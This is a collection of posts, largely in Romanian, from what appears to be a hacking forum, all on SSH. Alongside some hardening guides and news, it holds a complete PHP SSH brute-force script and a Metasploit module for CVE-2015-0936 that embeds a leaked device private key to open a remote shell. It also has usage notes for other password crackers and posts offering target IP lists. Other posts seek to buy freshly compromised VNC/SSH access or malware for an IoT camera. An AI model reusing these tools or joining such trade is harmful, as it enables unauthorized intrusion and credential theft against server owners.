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Salutare, Are cineva un plugin pentru wireshark sau vreo metoda de decodare a pachetelor securizate cu openssh? Ele pot fi decodate? Multumesc! Stefan
Hey Crackers!!! I discovered an IoT based device on 84.241.* which I think it's some kind of smart camera, If you have any malware or exploit to attack corresponding host please don't hesitate to share with me. If there's a better discovery technique please let me know. Share your experience of the same IoT based platforms. Your LOVE H3$!z
I'll just start this post with stating that I'm not doing this with malicious intents, nor am I going to use this for other purposes than learning, or advice using this on servers others than your own. That being said, let's get down to business. Why a SSH brute-forcer? Because too many people are still using password authentication with weak passwords. There are still many servers with sshd open with the default port exposed to internet, using accounts with weak passwords. Have a RaspberryPi? Put it on the Internet! Just take a look over Shodan's raspbian with port 22 query. It's crazy. We're kinda fighting fire with fire. Why Go? Because it's awesome, it's static typed, it's fast, has a big and very useful default library... did I mention it's awesome? And also because I'm on my journey learning Go, and this way I can learn how to use channels, ssh connections, and so on. How can I protect against this? For a start, edit /etc/ssh/sshd_config to disable password authentication and root login. A basic setup means: Changing the default port - many brute-forcers do not scan every port on the machine just to find an SSH server, they just check for port 22. Disable root login - if, by any chance, you need to be able to login as root remotely, use public key authentication. Disable password authentication - I can't stress this enough; just do it. Everyone can and should use public key authentication instead of password authentication. A passphrase is a big plus. Something to start your journey with: Port 2244 PermitRootLogin no #PermitRootLogin without-password #if you need pubkey root login PubkeyAuthentication yes PermitEmptyPasswords no PasswordAuthentication no This post assumes basic Go knowledge, and is not meant towards complete newbie gophers. I am a rookie myself, and currently trying to improve this. For testing, I’ve included a Dockerfile along the project for building a simple testing environment, but more on this at the end. Github: Sursa:
Salut, si imi cer scuze anticipat daca am postat unde nu trebuie sau daca am gresit cu ceva prin postarea acestui anunt. Caut un provider pe termen lung de VNC-uri FRESH de USA ... as vrea sa cumpar cantitati mai mari aproape zilnic de aceea cer si ofer seriozitate. NoLogin - SSH Tunnels - FRESH FRESH FRESH ... ( nu incercati va rog sa imi vindeti ceea ce se poate gasi free pe google sau pe alte forumuri). Repet caut colaborare pe termen lung ... si ulterior voi cauta sa cumpar si alte lucruri. Multumesc!
Until now Unix and Linux system administrators have to download a third-party SSH client software like Putty on their Windows machines to securely manage their machines and servers remotely through Secure Shell protocol or Shell Session (better known as SSH). This might have always been an awkward feature of Windows platform, as it lacks both – a native SSH client software for connecting to Linux machines, and an SSH server to support inbound connections from Linux machines. But… Believe it or not: You don't need to deal with any third-party SSH client now, as Microsoft is working on supporting OpenSSH. Yes, Microsoft has finally decided to bring OpenSSH client and server to Windows. The PowerShell team at Microsoft has announced that the company is going to support and contribute to OpenSSH community in an effort to deliver better SSH support in the PowerShell and Windows SSH software solutions. So, the upcoming version of Windows PowerShell – the command-line shell and scripting language – will allow users to manage Windows and Linux computers through SSH. For those who are unaware, SSH is basically designed to offer the best security when accessing another computer remotely. It not only encrypts the remote session, but also provides better authentication facilities, with features like secure file transferring and network port forwarding. This is not first time Microsoft has planned to adopt SSH for its Windows platform, the company had tried to allow the secure shell protocol to be used within Windows twice but was unable to implement it. However, developers who are eager to use this new functionality in PowerShell still have to wait for some time, as the project is still in the early planning phase. So far, there isn’t any definite release date. The PowerShell team will update more information on when users can expect SSH support shortly. Source
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HostBox SSH is a SSH password/account scanner written in python. README 2.0 Install INSTALLING WXPYTHON ------------------- INSTALLING PARAMIKO ------------------- sudo apt-get install python-paramiko 3.0 Usage To run HB in GUI mode: --------------------- ./ Should start the GUI, alt. try: "python" or "chmod +x && ./ To run HB in Console mode: ------------------------- ./HostBox-SSH -h For help with command line options Command line options: -i <ip list> -u user1,user2,user3.. -p pass1,pass2,pass3.. [-1/-2] [-n/-f] Username Options: -u user1,user2,user3.. || --ufile=usernames.txt Password Options: -p pass1,pass2,pass3.. || --pfile=passwords.txt Break Options: -1: Break on account login -2: Break on server login Speed Options: -n for normal scan || -f for fast scan mode Examples: ./ -i ip-list.txt -u guest,test,root -p blank,-username,password -1 -n This is running hostbox listing usernames and password settings on the commandline. -1 is break account testing when a login is found for that account. -n means normal scan speed. ./ -i ip-list.txt --ufile=usernames.txt --pfile=passwords.txt -2 -f This is running hostbox listing usernames and passwords from a textfile. -2 means the scanner will break testing the server when a login is found for that server. -f is for fast scan mode or multithreaded scan. "-username" and "blank" in the username/password spec tells the scanner to use the username as password / check for blank passwords. VISIT OSKAR STRIDSMAN'S IT RESOURCE -- -- HostBox-SSH 0.2 REPORT BUGS TO: Download HostBox SSH 0.2 ? Packet Storm
EN: This is a php script that uses a pre-defined set of possible passwords and tries them against a given ssh server. RO: Acesta este un script php care foloseste un set predefinit de posibile parole ?i le încearc? impotriva unui server ssh dat P.S dac? e am s? il testez ?i am s? revin cu mai multe informa?ii despre el. Download: Download: T35T-SSH Password Cracker / Scanner ? Packet Storm
Fisierul de configurare al SSH se afla il gasiti aici /etc/ssh/sshd_config. 1. Creare user de login. Se creaza un user pe server folosind litere mari, mici si numere pentru evitarea dictionarelor si o parola cat mai complexa. Exemplu eT40Pkh2. Acestui user nu i se vor da drepturi pe server. 2. Dezactivare root login. Se cauta parametrul PermitRootLogin. Daca e comentat, se decomenteaza sau daca lipseste se adauga si se se seteaza no: PermitRootLogin no 3. Se activeaza AllowUsers Acest parametru permite logarea prin SSH doar userilor care sunt trecuti in acest parametru. Se cauta parametrul AllowUsers. Daca e comentat, se decomenteaza sau daca lipseste se adauga si se adauga userul in dreptul parametrului. AllowUsers eT40Pkh2 sau varianta cu mai multi useri: AllowUsers eT40Pkh2 user2 user3 4. Schimbarea portului. Se schimba portul pe unul care nu este folosit. Exemplu 45753. Se cauta parametrul Port. Daca e comentat, se decomenteaza sau daca lipseste se adauga si se schimba 22 cu portul dorit. Port 45753 5. Setare timeout Se cauta parametrul ClientAliveInterval si ClientAliveCountMax. Daca sunt comentate, se decomenteaza sau daca lipsesc se adauga si se seteaza intervalul in secunde la ClientAliveInterval. Ex. 900 (15 min). Si si ClientAliveCountMax 0 ClientAliveInterval 900 ClientAliveCountMax 0 6. Instalare fail2ban Fail2ban este un tool care baneaza IP-urile care incearca sa se logheze prin SSH cu user/pass gresite. In functie de distributie: sudo apt-get install fail2ban sau sudo yum install fail2ban Se seteaza in /etc/fail2ban/jail.conf bantime = 600 maxretry = 3 (sau cum le doriti) /etc/init.d/fail2ban restart /etc/init.d/sshd restart Imbunatatiri se mai pot aduce dar acestea sunt setarile pe care le consider must have. Daca considera cineva ca am omis un "must have" e liber sa isi aduca contributia. Logarea pe server se va face in felul urmator: ssh eT40Pkh2@serverip -p45753
## # This module requires Metasploit: Penetration Testing Tool, Metasploit, Free Download | Rapid7 # Current source: ## require 'msf/core' require 'net/ssh' class Metasploit3 < Msf::Exploit::Remote include Msf::Auxiliary::Report Rank = ExcellentRanking def initialize(info = {}) super(update_info(info, { 'Name' => 'Ceragon FibeAir IP-10 SSH Private Key Exposure', 'Description' => %q{ Ceragon ships a public/private key pair on FibeAir IP-10 devices that allows passwordless authentication to any other IP-10 device. Since the key is easily retrievable, an attacker can use it to gain unauthorized remote access as the "mateidu" user. }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => false, 'Targets' => [ [ "Universal", {} ] ], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find', }, }, 'Author' => [ 'hdm', # Discovery 'todb' # Metasploit module and advisory text (mostly copy-paste) ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0936'], ['URL', ''], # Original Disclosure ['URL', ''] # Related issue with hardcoded user:pass ], 'DisclosureDate' => "Apr 01 2015", # Not a joke 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'DefaultTarget' => 0 })) register_options( [ # Since we don't include Tcp, we have to register this manually Opt::RHOST(), Opt::RPORT(22) ], self.class ) register_advanced_options( ['SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),'SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end def rport datastore['RPORT'] end def do_login(user) opt_hash = { :auth_methods => ['publickey'], :msframework => framework, :msfmodule => self, :port => rport, :key_data => [ key_data ], :disable_agent => true, :config => false, :record_auth_info => true, :proxies => datastore['Proxies'] } opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG'] begin ssh_socket = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh_socket = Net::SSH.start(rhost, user, opt_hash) end rescue Rex::ConnectionError return nil rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return nil rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return nil rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" return nil rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return nil end if ssh_socket # Create a new session from the socket, then dump it. conn =, '/bin/sh', true) ssh_socket = nil return conn else return nil end end def exploit conn = do_login("mateidu") if conn print_good "#{rhost}:#{rport} - Successful login" handler(conn.lsock) end end def key_data <<EOF -----BEGIN RSA PRIVATE KEY----- MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+ IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3 CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv 4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6 B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV 93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll 7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg== -----END RSA PRIVATE KEY----- EOF end end Source:
- #rhost#rport
- def
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To be able to restric a Linux user to www folder and disable ssh access, in my example maned user_name, we should proceed some steps: 1) Edit file /etc/ssh/sshd_config and add the next lines AllowUsers [COLOR="#FF0000"]user_name[/COLOR] Match User [COLOR="#FF0000"]user_name[/COLOR] ChrootDirectory /var/www ForceCommand internal-sftp 2) Edit the file /etc/passwd like in the next example: [COLOR="#FF0000"]user_name[/COLOR]:1003:1002::/var/www:/bin/false 3) Add user to www-data group using command: usermod -a -G www-data [COLOR="#FF0000"]user_name[/COLOR] 4) The final step is to restart the ssh service to reload the configuration using one of the next commands: /etc/init.d/ssh restart or service ssh restart After this steps if we fill try to connect using ssh we will got the next message: root@kali:/home/razvan1# ssh [COLOR="#FF0000"]user_name[/COLOR]@ [COLOR="#FF0000"]user_name[/COLOR]@'s password: This service allows sftp connections only. Connection to closed. Author: razvan1@hy
This will be the shortest tut made by me because need only few changes. On the begin we will install VLAN packet. This will be done using command: # apt-get install vlan -y After this we will load 8021q module into the kernel using command; # sh -c 'grep -q 8021q /etc/modules || echo 8021q >> /etc/modules' Now the only thing required is to add VLANs into the /etc/network/interfaces file as next example: auto eth1 iface eth1 inet static address netmask network broadcast gateway dns-nameserver # VLAN 69 auto vlan69 iface vlan69 inet static address netmask network broadcast vlan_raw_device eth2 # VLAN 96 auto vlan96 iface vlan96 inet static address netmask network broadcast mtu 1500 vlan_raw_device eth2 Now for the job to be done we will restart networking and all will be done # /etc/init.d/networking restart * Reconfiguring network interfaces... ssh start/running, process 1400 Set name-type for VLAN subsystem. Should be visible in /proc/net/vlan/config Added VLAN with VID == 69 to IF -:eth2:- ssh stop/waiting ssh start/running, process 1465 Set name-type for VLAN subsystem. Should be visible in /proc/net/vlan/config Added VLAN with VID == 96 to IF -:eth2:- ssh stop/waiting ssh start/running, process 1530 [ OK ] To check if are up we will read file vlan/config using command # cat /proc/net/vlan/config. The output will be the next if all is good. VLAN Dev name | VLAN ID Name-Type: VLAN_NAME_TYPE_PLUS_VID_NO_PAD vlan69 | 69 | eth2 vlan96 | 96 | eth2 Author: razvan1@hy
Intro Data grabbing: URL's (geturl/massurl) -> (scan) Configs, Databases, SQLi's (dork) Full Path Disclosures / Users (fpds) -> (brutefpds) Top websites info (top) Massive scanning XSS, SQLi, LFI, RFI (scan) FTP, SSH, DB's, IMAP (multibruter) Accurate SSH bruteforce (brutefpds) Plan Web Apps Grab url's via 'geturl' or 'massurl' (massurl requires list of tags as file) Scan url's parameters for vulns with 'scan' Servers Pick target, get ip range Scan for services on each IP and bruteforce with 'multibruter' Grab full path disclosures, and so linux usernames Perform SSH bruteforce for specific user with 'brutefpds' Info grabbing Use 'dork' for automatic dorking Use 'fpds' for full path disclosure grabbing Use 'search' for searching someone in ur databases Use 'top' for scanning all top websites of specific nation Others 'Stat' shows actual statistics and informations 'Show' display specific file 'Clear' and 'filter' - remove duplicates, remove blacklisted url's Others MultiBrtuer requirements (php5): php5-mysql - for mysql connections php5-pgsql - for postgresql connections libssh2-php - for ssh connections php5-sybase - for mssql connections php5-imap - for imap connections TODO: Fix problems with grabbing large amount of url's More search engines SQL Injector RFI shell uploader FSU is not secure as it should be Download ba.
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Aveti aici un scanner SSH mai nou: Download Scanner SSH + Bruteforcer v2 - Parola: WTBoS2JGbFlWbnBpTWtaNVdWaENhR050T1hOWlVUMDk=
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SSH brute-forcer tool written in PHP. about: * SSH Brute-Forcer * Written by Miyachung * Homepage : * Youtube Channel: * @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended) * @@ This tool is using process forking system * All rights reserved * Contact with coder: or usage: <?php/* .__ .__ _____ |__|___.__._____ ____ | |__ __ __ ____ ____ / \| < | |\__ \ _/ ___\| | \| | \/ \ / ___\ | Y Y \ |\___ | / __ \\ \___| Y \ | / | \/ /_/ > |__|_| /__|/ ____|(____ /\___ >___| /____/|___| /\___ / \/ \/ \/ \/ \/ \//_____/ * SSH Brute-Forcer * Written by Miyachung * Homepage : * Youtube Channel: * Usage : * @@ 'ssh2_connect' and 'pcntl_fork' functions must be installed on your machine (BackTrack5 Recommended) * @@ This tool is using process forking system * All rights reserved * Contact with coder: or */ error_reporting(0); /* * Call the class */ $SSH = new SSHBruter(); /* * Does control if 'ssh2_connect' and 'pcntl_fork' functions not installed * if 'ssh2_connect' or 'pcntl_fork' functions not installed you can't use this brute-forcer tool */ if(!function_exists("ssh2_connect")) { $SSH->showErrorMsg(1); } elseif(!function_exists("pcntl_fork")) { $SSH->showErrorMsg(2); } /* * Parse arguments * There is 3 way to brute * Single : -h <host> -u <user> -w <wordlist> -o <output> -t <thread> * Combolist : -c <combolist> -o <output> -t <thread> * Multiple : -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread> */ $options_single = getopt("h:u:w:o:t:"); $options_combo = getopt("c:o:t:"); $options_multi = getopt("f:u:w:o:t:"); /* * Does arguments control! */ if($options_single) { if($options_single["h"] != null && $options_single["u"] != null && $options_single["w"] != null && $options_single["o"] != null && $options_single["t"] != null) { $SSH->SingleBrute( $options_single["h"] , $options_single["u"] , $options_single["w"] , $options_single["o"] , $options_single["t"] ); } else{ $SSH->showErrorMsg(3); } } elseif($options_combo) { if($options_combo["c"] != null && $options_combo["o"] != null && $options_combo["t"] != null) { $SSH->ComboBrute( $options_combo["c"] , $options_combo["o"] , $options_combo["t"] ); } else{ $SSH->showErrorMsg(3); } } elseif($options_multi) { if($options_multi["f"] != null && $options_multi["u"] != null & $options_multi["w"] != null && $options_multi["o"] != null && $options_multi["t"] != null) { $SSH->MultiBrute( $options_multi["f"] , $options_multi["u"] , $options_multi["w"] , $options_multi["o"] , $options_multi["t"] ); } else{ $SSH->showErrorMsg(3); } } else { $SSH->showErrorMsg(3); } class SSHBruter { /* * Prints 'MAIN_MESSAGE' if arguments used wrong */ const MAIN_MESSAGE = "\n*********************************************\n* SSH Brute-Forcer Single or Multiple\n* Written by Miyachung\n* Homepage :\n********************************* ************\n"; /* * Prints 'NOT_INSTALLED_SSH' if ssh2_connect function not found */ const NOT_INSTALLED_SSH = "Oops! 'ssh2_connect' function isn't exists you can't use this tool on this machine\n\n"; /* * Prints 'NOT_INSTALLED_PCNTL' if pcntl_fork function not found */ const NOT_INSTALLED_PCNTL= "Oops! 'pcntl_fork' function isn't exists you can't use this tool on this machine\n\n"; /* * Prints 'ARGMISS' if arguments not specified */ const ARGMISS = "[!]Wrong Usage!\nphp SSHBruter.php -h <host> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread>\nphp SSHBruter.php -c <combolist> -o <output> -t <thread>\n\n"; /* * Counts hosts & passwords , increments in foreach loop */ private $counter = 0; /* * Performs brute force to specified single host arguments -h <host> -u <user> -w <wordlist> -o <output> -t <thread> */ function SingleBrute( $host , $user, $wordlist, $output , $thread ) { echo "\n"; echo "Host: ".$host."\n"; echo "User: ".$user."\n\n"; $chunk_wordlist = array_chunk( file($wordlist) , $thread ); foreach($chunk_wordlist as $passwords) { foreach($passwords as $password) { $this->counter++; $fork = pcntl_fork(); if(!$fork) { $perform_single = $this->SSH( $host , $user , trim($password) , $output ); if($perform_single) { print "Sleeping 120 seconds , PRESS CTRL + C NOW!"; sleep(120); } exit; } } $this->waitForThreadFinish(); } } /* * Performs brute force to specified combo list arguments -c <combolist> -o <output> -t <thread> */ function ComboBrute( $combolist , $output , $thread ) { $chunk_combolist = array_chunk( file($combolist) , $thread); foreach($chunk_combolist as $combo) { foreach($combo as $hostuserpwd) { $this->counter++; list($host,$user,$password) = split(":",trim($hostuserpwd)); $fork = pcntl_fork(); if(!$fork) { $this->SSH( $host , $user , $password , $output ); exit; } } $this->waitForThreadFinish(); } } /* * Performs brute force to specified host list arguments -f <hostfile> -u <user> -w <wordlist> -o <output> -t <thread> */ function MultiBrute( $hostlist , $user , $wordlist , $output , $thread ) { foreach(file($hostlist) as $host) { $chunk_wordlist = array_chunk( file($wordlist) , $thread ); foreach($chunk_wordlist as $passwords) { foreach($passwords as $password) { $this->counter++; $fork = pcntl_fork(); if(!$fork) { $this->SSH( trim($host) , $user , trim($password) , $output ); exit; } } $this->waitForThreadFinish(); } } } /* * Performs login to host with specified user and password(s) */ function SSH( $host , $user , $password , $output , $port = 22 ) { $connect = ssh2_connect( $host , $port ); if(!$connect) { print "[".$this->counter."] Host: ".$host." Connection Failed\n"; flush(); break; } else { $auth = ssh2_auth_password( $connect , $user , $password ); if($auth) { $a = "*********************************************\n"; $a.= "[+] Found!\n"; $a.= "[+] Host: ".$host."\n"; $a.= "[+] User: ".$user."\n"; $a.= "[+] Password: ".$password."\n"; print $a."[!] If You Want To Stop Brute Press CTRL + C Now!\n******************************************** *\n"; self::SaveResult( $output , $a ); return true; } else { print "[".$this->counter."] Trying Host: ".$host." Username: ".$user." Password: ".$password."\n"; flush(); break; } } } /* * All error messages showing from there */ function showErrorMsg( $errno ) { print self::MAIN_MESSAGE; if($errno == 1) { print self::NOT_INSTALLED_SSH; exit; } if($errno == 2) { print self::NOT_INSTALLED_PCNTL; exit; } if($errno == 3) { print self::ARGMISS; exit; } } /* * Waits for threads to finish */ function waitForThreadFinish() { while (pcntl_waitpid(0, $status) != -1) { $status = pcntl_wexitstatus($status); } } /* * Saves everything with this function */ static function SaveResult( $output,$text ) { $open_file = fopen( $output , "a" ); fwrite( $open_file , $text ); fclose( $open_file ); } } # miyachung represents / group ?>
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[*] SSH_ Brute-force by MMxM Usage: ./ssh-crack.php <host> <user> <wordlist> Download: Mirror:
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P.Y.M.P. Scanner unealta de securitate SSH P.Y.M.P. este un scanner si bruteforcer(bazat pe dicitonar) pentru servere SSH. Avand performanta net superioara fata de concurenta, si o interfata usor de utilizat si prietenoasa, P.Y.M.P. Scanner este si cross-platform, putand fi rulat atat pe sistemele de operare de la Microsoft, cat si pe orice distributie Linux. Acum, vom lasa imaginile sa vorbeasca pentru noi: Programul nu este gratuit, dar avand in vedere ca suntem romani si autorul/autoarea/autorii/autistii acestui program este/sunt utilizatori RST, membrii forumului vor beneficicia de oferta cumperi o cheie primesti alta gratis(adica 50% reducere pe romaneste) si o vaza de lut facuta de calugari beduini autisti(bateriile nu sunt incluse). Pachetele magice: [*=center]20 chei - 39.99 EUR [*=center]40 chei - 49.69 EUR [*=center]100 chei - 80.10 EUR [*=center]Numar specificat de chei - negociabil [*=center]Nelimitat/Fara licenta - 400 EUR Transport gratuit Plata se face prin PayPal momentan. Pentru comenzi si alte intrebari in legatura cu aceste chei si alte detalii , puteti folosi sistemul de MP(mesagerie privata) integrat in forum sau la adresa de mail ntchex[at] P.S --- Q2luZSBlc3RlIG1haSB2ZWNoaSBwZSBmb3J1bSBzdGllIGNpbmUgc3VudC9zdW50ZW0vZXN0ZW0gc2kgcG90IGdhcmFudGEgbGVnaXRpbWl0YXRlYSBhY2VzdHVpIHByb2R1cy4=
Scurta descriere: Este un program asemanator bitvise tunnelier doar ca mult mai simplu de utilizat si portabil. Este suportat de orice os care are java instalat. Este prima versiune a acestui tool, asa ca va rog fiti ingaduitori. Astept orice parere ( buna sau rea ) si ce ati vrea sa vedeti, sau sa contina versiunea 2. Download: Virustotal:
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Cei care doriti sa dati brute dupa multiple ip si aveti nevoie de ip-uri postati aici, ce are legatura cu portul 22(SSH) si voi posta eu. Proaspete: IP Country: Random Tip: SSH Port: 22 Nr: 6.193 Data: Marti 14.09.2011 - Vizitati Proaspete: IP Country: Romania Tip: SSH Port: 22 Nr: 31.249 Data: Marti 14.09.2011 Vizitati
Salut, dupa cum spune si titlul as vrea sa cumpar un scanner SSH. Nu vreau sa imi vindeti versiuni publice... am folosit a cel putin 20 de scannere, cu diferite pass file-uri, etc. as vrea ceva unic, facut de propria mana. As putea oferi 10 euro transfer credit orange / vodafone / cosmote sau paypal. Doresc seriozitate.